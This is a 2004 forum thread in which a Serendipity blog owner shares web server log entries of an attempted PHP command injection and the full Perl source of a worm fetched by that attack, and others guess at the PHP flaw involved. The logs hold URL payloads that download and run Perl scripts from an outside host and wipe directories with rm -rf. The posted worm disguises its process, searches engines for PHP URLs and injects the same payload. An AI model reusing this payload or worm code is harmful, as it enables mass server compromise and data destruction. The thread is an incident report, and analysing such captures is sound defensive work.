Atom Hack Attempt?

Random stuff about serendipity. Discussion, Questions, Paraphernalia.
Post Reply
boone
Regular
Posts: 16
Joined: Sat Jan 17, 2004 3:09 am
Contact:
Contact boone

Atom Hack Attempt?

Post by boone »

I saw this in my web logfile today. Any idea what hole they're trying to exploit and if I'm vulnerable? I'm running S9Y 0.7.1 and PHP 4.3.10 on Linux.

209.126.164.246 - - [26/Dec/2004:18:20:53 -0500] "GET /mike/rss.php?version=atom0.3&rush=echo%20_START_%3B%20cd%20/tmp;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 39900 "-" "LWP::Simple/5.43"
Last edited by boone on Mon Dec 27, 2004 3:50 am, edited 1 time in total.
Top
boone
Regular
Posts: 16
Joined: Sat Jan 17, 2004 3:09 am
Contact:
Contact boone

Post by boone »

Hmm...a similar hit on rss.php:

67.18.198.10 - - [26/Dec/2004:18:39:33 -0500] "GET /mike/rss.php?version=1.0&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F
&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 39081 "-" "LWP::Simple/5.65"
Last edited by boone on Mon Dec 27, 2004 3:55 am, edited 1 time in total.
Top
boone
Regular
Posts: 16
Joined: Sat Jan 17, 2004 3:09 am
Contact:
Contact boone

Post by boone »

One of the PHP "sess" files referenced in that mess of a URL contained this:

Code: Select all

#!/usr/bin/perl

use LWP::Simple;
use IO::Socket::INET;




my $processo = "/usr/bin/httpd -DSSL";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

while(1){
$numr = int rand(9999);
$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq = int rand(9999);

open(sites,">$arq");
print sites "";
close(sites);


$procura = 'inurl:*.php?*=' . $numr;

for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com", PeerPort => 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
  $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
  $uber=$1;
	if ($uber !~/translate/)
	{
	if ($uber !~ /cache/)
	{
	if ($uber !~ /"/)
	{
	if ($uber !~ /google/)
	{
	if ($uber !~ /216/)
	{
	if ($uber =~/http/)
	{
	if ($uber !~ /start=/)
	{
	  open(arq,">>$arq");
          print arq "$uber\n";
          close(arq);
}}}}}}}}}


for($cadenu=1;$cadenu <= 991; $cadenu +=10){

@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
  $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
  $uber=$1;
  
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;

open(a,">>$arq");
print a "$uber\n";
close(a);
}}

$ark = $arq; 
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo =""; 
foreach (@si){
if (!$si{$_})
{ 
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);


$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
 {$sites[$a] = $_;
  chomp $sites[$a];
  $a++;
  $b++;}
close(ae);

for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
      print file "";
close(file);
open (file, ">$caxe1");
      print file "";
close(file);
$k=0;
$e=0;
 $data=get($sites[$a]) or next;
  while($data=~ m/<a href=".*?">.*?<\/a>/){
  $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
  $ubersite=$1;
  
  if ($ubersite =~/"/)
   {
   $nu = index $ubersite, '"';
   $ubersite = substr($ubersite,0,$nu);
   }
if ($ubersite !~/http/)
 {$ubersite = $sites[$a].'/'.$ubersite;} 
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n"; 
close(file); 
}

$lista1 = 'http://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd /tmp;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *;cd /var/tmp/;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *;cd /var/spool/mail/;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *;cd /var/mail/;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *';

$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
 $ja[$t] = $_;
 chomp $ja[$t];
 $t++;
 $y++;
}
close(opa);
$t=1;
while ($t < $y)
   {
    if ($ja[$t] =~/=/)
      {
       $num = rindex $ja[$t], '=';
       $num += 1;
       $ja[$t] = substr($ja[$t],0,$num);    
            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
            print jaera "$ja[$t]$lista1\n";
            close(jaera);
        $num = index $ja[$t], '=';
        $num += 1;
        $ja[$t] = substr($ja[$t],0,$num);       
        $num1 = rindex $ja[$t], '.';
        $subproc = substr($ja[$t],$num1,$num);
         
            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
            print jaera "$ja[$t]$lista1\n";
            close(jaera);
      }
     $t++;
     }
$ark = "$caxe1"; 
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo =""; 
foreach (@si){
if (!$si{$_})
{ 
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
	$q=0;
	$w=0;
	 @hot;
	open (ops,"<$caxe1");
	while(<ops>)
	{
	$hot[$q] = $_;
	chomp $hot[$q];
	$q++;
	$w++;
	}
	close(ops);

for($q=0;$q<=$w;$q++)
  {
 
  if ($hot[$q] =~/http/)
    {
	$tipo=get($hot[$q]) or next;
	}}


}
}
Top
boone
Regular
Posts: 16
Joined: Sat Jan 17, 2004 3:09 am
Contact:
Contact boone

Post by boone »

The more I look at this stuff it looks like a worm to exploit the recent PHP flaws. Hopefully I'm alright with S9Y 0.7.1 and PHP 4.3.10.
Top
Little Hamster
Regular
Posts: 62
Joined: Thu Oct 07, 2004 3:16 pm

Post by Little Hamster »

If it's the PHP flaw, you'll be fine. Only versions before 4.3.10 are vulnerable.
Top
nohn
Regular
Posts: 37
Joined: Fri Oct 08, 2004 3:28 pm

Post by nohn »

It's definitly not the phpBB bug. I don't know enough about the unserialize() PHP-bug, but I agree: It's the most likely theory.
Top
Post Reply

Return to “General discussions”